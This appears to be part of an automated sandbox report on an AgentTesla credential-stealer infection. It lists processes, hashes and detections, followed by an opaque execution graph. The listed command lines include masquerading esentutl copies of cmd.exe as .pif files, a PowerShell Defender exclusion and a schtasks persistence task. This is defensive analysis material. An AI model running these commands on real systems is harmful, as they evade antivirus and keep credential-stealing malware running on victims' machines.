                                                                                                            Has exited:true

                                                                                                            Target ID:7
                                                                                                            Start time:11:00:20
                                                                                                            Start date:21/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff620390000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:8
                                                                                                            Start time:11:00:20
                                                                                                            Start date:21/11/2024
                                                                                                            Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                                                                                                            Imagebase:0xc90000
                                                                                                            File size:352'768 bytes
                                                                                                            MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:moderate
                                                                                                            Has exited:true

                                                                                                            Target ID:9
                                                                                                            Start time:11:00:21
                                                                                                            Start date:21/11/2024
                                                                                                            Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
                                                                                                            Imagebase:0xc90000
                                                                                                            File size:352'768 bytes
                                                                                                            MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:moderate
                                                                                                            Has exited:true

                                                                                                            Target ID:10
                                                                                                            Start time:11:00:21
                                                                                                            Start date:21/11/2024
                                                                                                            Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Wisrysxl.PIF /o
                                                                                                            Imagebase:0xc90000
                                                                                                            File size:352'768 bytes
                                                                                                            MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:moderate
                                                                                                            Has exited:true

                                                                                                            Target ID:11
                                                                                                            Start time:11:00:22
                                                                                                            Start date:21/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff620390000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:12
                                                                                                            Start time:11:00:22
                                                                                                            Start date:21/11/2024
                                                                                                            Path:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                            Imagebase:0x400000
                                                                                                            File size:68'096 bytes
                                                                                                            MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Antivirus matches:
                                                                                                            • Detection: 3%, ReversingLabs
                                                                                                            Reputation:moderate
                                                                                                            Has exited:true

                                                                                                            Target ID:13
                                                                                                            Start time:11:00:23
                                                                                                            Start date:21/11/2024
                                                                                                            Path:C:\Users\user\AppData\Local\Temp\neworigin.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\neworigin.exe"
                                                                                                            Imagebase:0xa60000
                                                                                                            File size:250'368 bytes
                                                                                                            MD5 hash:D6A4CF0966D24C1EA836BA9A899751E5
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.1624352397.0000000002DBB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.1624352397.0000000002DCE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000000.1467200681.0000000000A62000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000000.1467200681.0000000000A62000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.1624352397.0000000002DC3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.1624352397.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.1624352397.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security
                                                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: ditekSHen
                                                                                                            Antivirus matches:
                                                                                                            • Detection: 100%, Avira
                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                            • Detection: 82%, ReversingLabs
                                                                                                            Reputation:moderate
                                                                                                            Has exited:true

                                                                                                            Target ID:14
                                                                                                            Start time:11:00:23
                                                                                                            Start date:21/11/2024
                                                                                                            Path:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                                                                                                            Imagebase:0x150000
                                                                                                            File size:231'936 bytes
                                                                                                            MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Antivirus matches:
                                                                                                            • Detection: 100%, Avira
                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                            • Detection: 66%, ReversingLabs
                                                                                                            Has exited:true

                                                                                                            Target ID:16
                                                                                                            Start time:11:00:25
                                                                                                            Start date:21/11/2024
                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                                                                                                            Imagebase:0xdc0000
                                                                                                            File size:433'152 bytes
                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:17
                                                                                                            Start time:11:00:25
                                                                                                            Start date:21/11/2024
                                                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 11:05 /du 23:59 /sc daily /ri 1 /f
                                                                                                            Imagebase:0xec0000
                                                                                                            File size:187'904 bytes
                                                                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:18
                                                                                                            Start time:11:00:25
                                                                                                            Start date:21/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff620390000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:19
                                                                                                            Start time:11:00:26
                                                                                                            Start date:21/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff620390000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:20
                                                                                                            Start time:11:00:26
                                                                                                            Start date:21/11/2024
                                                                                                            Path:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                                                                                                            Imagebase:0xe70000
                                                                                                            File size:231'936 bytes
                                                                                                            MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Antivirus matches:
                                                                                                            • Detection: 100%, Avira
                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                            • Detection: 66%, ReversingLabs
                                                                                                            Has exited:false

                                                                                                            Target ID:21
                                                                                                            Start time:11:00:27
                                                                                                            Start date:21/11/2024
                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpFF65.tmp.cmd""
                                                                                                            Imagebase:0xd70000
                                                                                                            File size:236'544 bytes
                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:22
                                                                                                            Start time:11:00:27
                                                                                                            Start date:21/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff620390000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:23
                                                                                                            Start time:11:00:27
                                                                                                            Start date:21/11/2024
                                                                                                            Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:timeout 6
                                                                                                            Imagebase:0xfd0000
                                                                                                            File size:25'088 bytes
                                                                                                            MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:24
                                                                                                            Start time:11:00:28
                                                                                                            Start date:21/11/2024
                                                                                                            Path:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                                            Imagebase:0x450000
                                                                                                            File size:231'936 bytes
                                                                                                            MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:25
                                                                                                            Start time:11:00:30
                                                                                                            Start date:21/11/2024
                                                                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                            Imagebase:0x7ff6616b0000
                                                                                                            File size:496'640 bytes
                                                                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:26
                                                                                                            Start time:11:00:32
                                                                                                            Start date:21/11/2024
                                                                                                            Path:C:\Users\Public\Libraries\Wisrysxl.PIF
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\Public\Libraries\Wisrysxl.PIF"
                                                                                                            Imagebase:0x400000
                                                                                                            File size:1'392'640 bytes
                                                                                                            MD5 hash:67DAC6AE9EE770115DB85CC71979DC41
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:Borland Delphi
                                                                                                            Antivirus matches:
                                                                                                            • Detection: 100%, Avira
                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                            • Detection: 29%, ReversingLabs
                                                                                                            Has exited:true

                                                                                                            Target ID:28
                                                                                                            Start time:11:00:34
                                                                                                            Start date:21/11/2024
                                                                                                            Path:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                            Imagebase:0x400000
                                                                                                            File size:68'096 bytes
                                                                                                            MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:29
                                                                                                            Start time:11:00:35
                                                                                                            Start date:21/11/2024
                                                                                                            Path:C:\Users\user\AppData\Local\Temp\neworigin.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\neworigin.exe"
                                                                                                            Imagebase:0x8f0000
                                                                                                            File size:250'368 bytes
                                                                                                            MD5 hash:D6A4CF0966D24C1EA836BA9A899751E5
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000002.3790934046.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001D.00000002.3790934046.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Has exited:false

                                                                                                            Target ID:30
                                                                                                            Start time:11:00:35
                                                                                                            Start date:21/11/2024
                                                                                                            Path:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                                                                                                            Imagebase:0xbe0000
                                                                                                            File size:231'936 bytes
                                                                                                            MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:32
                                                                                                            Start time:11:00:41
                                                                                                            Start date:21/11/2024
                                                                                                            Path:C:\Users\Public\Libraries\Wisrysxl.PIF
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\Public\Libraries\Wisrysxl.PIF"
                                                                                                            Imagebase:0x400000
                                                                                                            File size:1'392'640 bytes
                                                                                                            MD5 hash:67DAC6AE9EE770115DB85CC71979DC41
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:Borland Delphi
                                                                                                            Has exited:true

                                                                                                            Target ID:33
                                                                                                            Start time:11:00:43
                                                                                                            Start date:21/11/2024
                                                                                                            Path:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                            Imagebase:0x400000
                                                                                                            File size:68'096 bytes
                                                                                                            MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:34
                                                                                                            Start time:11:00:44
                                                                                                            Start date:21/11/2024
                                                                                                            Path:C:\Users\user\AppData\Local\Temp\neworigin.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\neworigin.exe"
                                                                                                            Imagebase:0xaa0000
                                                                                                            File size:250'368 bytes
                                                                                                            MD5 hash:D6A4CF0966D24C1EA836BA9A899751E5
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:false

                                                                                                            Target ID:35
                                                                                                            Start time:11:00:44
                                                                                                            Start date:21/11/2024
                                                                                                            Path:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                                                                                                            Imagebase:0xf40000
                                                                                                            File size:231'936 bytes
                                                                                                            MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:36
                                                                                                            Start time:11:00:50
                                                                                                            Start date:21/11/2024
                                                                                                            Path:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                                                                                                            Imagebase:0xc80000
                                                                                                            File size:231'936 bytes
                                                                                                            MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:38
                                                                                                            Start time:11:01:03
                                                                                                            Start date:21/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff620390000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Reset < >

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:14.7%
                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                              Signature Coverage:67.8%
                                                                                                              Total number of Nodes:2000
                                                                                                              Total number of Limit Nodes:25
                                                                                                              execution_graph 32402 2e67074 33223 2e44860 32402->33223 33224 2e44871 33223->33224 33225 2e44897 33224->33225 33226 2e448ae 33224->33226 33232 2e44bcc 33225->33232 33241 2e445a0 33226->33241 33229 2e448a4 33230 2e448df 33229->33230 33246 2e44530 33229->33246 33234 2e44bd9 33232->33234 33240 2e44c09 33232->33240 33233 2e44c02 33237 2e445a0 11 API calls 33233->33237 33234->33233 33236 2e44be5 33234->33236 33252 2e42c44 11 API calls 33236->33252 33237->33240 33238 2e44bf3 33238->33229 33253 2e444dc 33240->33253 33242 2e445a4 33241->33242 33243 2e445c8 33241->33243 33266 2e42c10 33242->33266 33243->33229 33245 2e445b1 33245->33229 33247 2e44534 33246->33247 33250 2e44544 33246->33250 33249 2e445a0 11 API calls 33247->33249 33247->33250 33248 2e44572 33248->33230 33249->33250 33250->33248 33251 2e42c2c 11 API calls 33250->33251 33251->33248 33252->33238 33254 2e444e2 33253->33254 33255 2e444fd 33253->33255 33254->33255 33257 2e42c2c 33254->33257 33255->33238 33258 2e42c3a 33257->33258 33259 2e42c30 33257->33259 33258->33255 33259->33258 33260 2e42d19 33259->33260 33264 2e46520 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 33259->33264 33265 2e42ce8 7 API calls 33260->33265 33263 2e42d3a 33263->33255 33264->33260 33265->33263 33267 2e42c14 33266->33267 33267->33245 33268 2e42c1e 33267->33268 33269 2e42d19 33267->33269 33273 2e46520 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 33267->33273 33268->33245 33274 2e42ce8 7 API calls 33269->33274 33272 2e42d3a 33272->33245 33273->33269 33274->33272 33275 2e63e12 33276 2e44860 11 API calls 33275->33276 33277 2e63e33 33276->33277 33278 2e63e4b 33277->33278 34821 2e447ec 33278->34821 33280 2e63e6a 33281 2e63e82 33280->33281 34836 2e589d0 33281->34836 33286 2e44860 11 API calls 33287 2e63ee0 33286->33287 33288 2e63eeb 33287->33288 33289 2e63ef7 33288->33289 33290 2e44860 11 API calls 33289->33290 33291 2e63f18 33290->33291 33292 2e63f23 33291->33292 33293 2e63f30 33292->33293 33294 2e447ec 11 API calls 33293->33294 33295 2e63f4f 33294->33295 33296 2e63f67 33295->33296 33297 2e589d0 20 API calls 33296->33297 33298 2e63f73 33297->33298 33299 2e44860 11 API calls 33298->33299 33300 2e63f94 33299->33300 33301 2e63f9f 33300->33301 33302 2e63fac 33301->33302 33303 2e447ec 11 API calls 33302->33303 33304 2e63fcb 33303->33304 33305 2e63fe3 33304->33305 33306 2e589d0 20 API calls 33305->33306 33307 2e63fef 33306->33307 33308 2e44860 11 API calls 33307->33308 33309 2e64010 33308->33309 33310 2e6401b 33309->33310 33311 2e64028 33310->33311 33312 2e447ec 11 API calls 33311->33312 33313 2e64047 33312->33313 33314 2e64052 33313->33314 33315 2e6405f 33314->33315 33316 2e589d0 20 API calls 33315->33316 33317 2e6406b 33316->33317 34856 2e5e358 33317->34856 33320 2e64091 33321 2e640a2 33320->33321 34861 2e5dc8c 33321->34861 33324 2e44860 11 API calls 33325 2e640f1 33324->33325 33326 2e640fc 33325->33326 33327 2e447ec 11 API calls 33326->33327 33328 2e64128 33327->33328 33329 2e64133 33328->33329 33330 2e589d0 20 API calls 33329->33330 33331 2e6414c 33330->33331 33332 2e44860 11 API calls 33331->33332 33333 2e6416d 33332->33333 33334 2e447ec 11 API calls 33333->33334 33335 2e641a4 33334->33335 33336 2e641af 33335->33336 33337 2e589d0 20 API calls 33336->33337 33338 2e641c8 33337->33338 34876 2e588b8 LoadLibraryW 33338->34876 33340 2e641cd 33341 2e641d7 33340->33341 34881 2e5e678 33341->34881 33344 2e44860 11 API calls 33345 2e64217 33344->33345 33346 2e6422f 33345->33346 33347 2e447ec 11 API calls 33346->33347 33348 2e6424e 33347->33348 33349 2e64259 33348->33349 33350 2e589d0 20 API calls 33349->33350 33351 2e64272 Sleep 33350->33351 33352 2e44860 11 API calls 33351->33352 33353 2e6429d 33352->33353 33354 2e642b5 33353->33354 33355 2e447ec 11 API calls 33354->33355 33356 2e642d4 33355->33356 33357 2e642df 33356->33357 35020 2e446d4 33357->35020 34822 2e447f0 34821->34822 34823 2e44851 34821->34823 34824 2e44530 34822->34824 34825 2e447f8 34822->34825 34829 2e445a0 11 API calls 34824->34829 34831 2e44544 34824->34831 34825->34823 34826 2e44807 34825->34826 34828 2e44530 11 API calls 34825->34828 34830 2e445a0 11 API calls 34826->34830 34827 2e44572 34827->33280 34828->34826 34829->34831 34833 2e44821 34830->34833 34831->34827 34832 2e42c2c 11 API calls 34831->34832 34832->34827 34834 2e44530 11 API calls 34833->34834 34835 2e4484d 34834->34835 34835->33280 34837 2e589e4 34836->34837 35022 2e581cc 34837->35022 34839 2e58a1d 35033 2e58274 34839->35033 34841 2e58a36 35044 2e57d78 34841->35044 34843 2e58a95 35058 2e58338 34843->35058 34846 2e58abc 35070 2e44500 34846->35070 34849 2e5f094 34850 2e5f0b9 34849->34850 34851 2e5f0e5 34850->34851 35081 2e446c4 11 API calls 34850->35081 35082 2e44530 11 API calls 34850->35082 34853 2e444dc 11 API calls 34851->34853 34854 2e5f0fa 34853->34854 34854->33286 34857 2e44bcc 11 API calls 34856->34857 34858 2e5e370 34857->34858 34859 2e5e391 34858->34859 35083 2e449f8 34858->35083 34859->33320 34862 2e5dca2 34861->34862 35089 2e44f20 34862->35089 34864 2e5dcaa 34865 2e5dcca RtlDosPathNameToNtPathName_U 34864->34865 35093 2e5dbdc 34865->35093 34867 2e5dce6 NtCreateFile 34868 2e5dd11 34867->34868 34869 2e449f8 11 API calls 34868->34869 34870 2e5dd23 NtWriteFile NtClose 34869->34870 34871 2e5dd4d 34870->34871 35094 2e44c60 34871->35094 34874 2e444dc 11 API calls 34875 2e5dd5d Sleep 34874->34875 34875->33324 34877 2e58274 15 API calls 34876->34877 34878 2e588f1 34877->34878 34879 2e57d78 18 API calls 34878->34879 34880 2e5891f FreeLibrary 34879->34880 34880->33340 34882 2e5e681 34881->34882 34882->34882 34883 2e44860 11 API calls 34882->34883 34884 2e5e6ca 34883->34884 34885 2e447ec 11 API calls 34884->34885 34886 2e5e6ef 34885->34886 34887 2e589d0 20 API calls 34886->34887 34888 2e5e70a 34887->34888 34889 2e44860 11 API calls 34888->34889 34890 2e5e723 34889->34890 34891 2e447ec 11 API calls 34890->34891 34892 2e5e748 34891->34892 34893 2e589d0 20 API calls 34892->34893 34894 2e5e763 34893->34894 34895 2e44860 11 API calls 34894->34895 34896 2e5e77c 34895->34896 34897 2e447ec 11 API calls 34896->34897 34898 2e5e7a1 34897->34898 34899 2e589d0 20 API calls 34898->34899 34900 2e5e7bc 34899->34900 34901 2e44860 11 API calls 34900->34901 34902 2e5e7ee 34901->34902 34903 2e589d0 20 API calls 34902->34903 34904 2e5e838 34903->34904 34905 2e44860 11 API calls 34904->34905 34906 2e5e86f 34905->34906 34907 2e447ec 11 API calls 34906->34907 34908 2e5e894 34907->34908 34909 2e589d0 20 API calls 34908->34909 34910 2e5e8af 34909->34910 34911 2e44860 11 API calls 34910->34911 34912 2e5e8c8 34911->34912 34913 2e447ec 11 API calls 34912->34913 34914 2e5e8ed 34913->34914 34915 2e589d0 20 API calls 34914->34915 34916 2e5e908 34915->34916 34917 2e44860 11 API calls 34916->34917 34918 2e5e921 34917->34918 34919 2e447ec 11 API calls 34918->34919 34920 2e5e946 34919->34920 34921 2e589d0 20 API calls 34920->34921 34922 2e5e961 34921->34922 35097 2e47f2c 34922->35097 34924 2e5e985 35101 2e58788 34924->35101 34927 2e44860 11 API calls 34928 2e5ea0a 34927->34928 34929 2e447ec 11 API calls 34928->34929 34930 2e5ea3b 34929->34930 34931 2e589d0 20 API calls 34930->34931 34932 2e5ea5f 34931->34932 34933 2e44860 11 API calls 34932->34933 34934 2e5ea7b 34933->34934 34935 2e447ec 11 API calls 34934->34935 34936 2e5eaac 34935->34936 34937 2e589d0 20 API calls 34936->34937 34938 2e5ead0 34937->34938 34939 2e44860 11 API calls 34938->34939 34940 2e5eaec 34939->34940 34941 2e447ec 11 API calls 34940->34941 34942 2e5eb1d 34941->34942 34943 2e589d0 20 API calls 34942->34943 34944 2e5eb41 34943->34944 34945 2e44860 11 API calls 34944->34945 34946 2e5eb5d 34945->34946 34947 2e447ec 11 API calls 34946->34947 34948 2e5eb7b 34947->34948 35113 2e5894c LoadLibraryW 34948->35113 34951 2e44860 11 API calls 34952 2e5ebac 34951->34952 34953 2e447ec 11 API calls 34952->34953 34954 2e5ebca 34953->34954 34955 2e5894c 21 API calls 34954->34955 34956 2e5ebdf 34955->34956 34957 2e44860 11 API calls 34956->34957 34958 2e5ebfb 34957->34958 34959 2e447ec 11 API calls 34958->34959 34960 2e5ec19 34959->34960 34961 2e5894c 21 API calls 34960->34961 34962 2e5ec2e 34961->34962 34963 2e44860 11 API calls 34962->34963 34964 2e5ec4a 34963->34964 34965 2e447ec 11 API calls 34964->34965 34966 2e5ec68 34965->34966 34967 2e5894c 21 API calls 34966->34967 34968 2e5ec7d 34967->34968 34969 2e5ec87 34968->34969 34970 2e5eee2 34968->34970 34971 2e44860 11 API calls 34969->34971 34972 2e44500 11 API calls 34970->34972 34975 2e5eca3 34971->34975 34973 2e5eeff 34972->34973 34974 2e44c60 SysFreeString 34973->34974 34976 2e5ef0a 34974->34976 34978 2e447ec 11 API calls 34975->34978 34977 2e44500 11 API calls 34976->34977 34979 2e5ef1a 34977->34979 34984 2e5ecd4 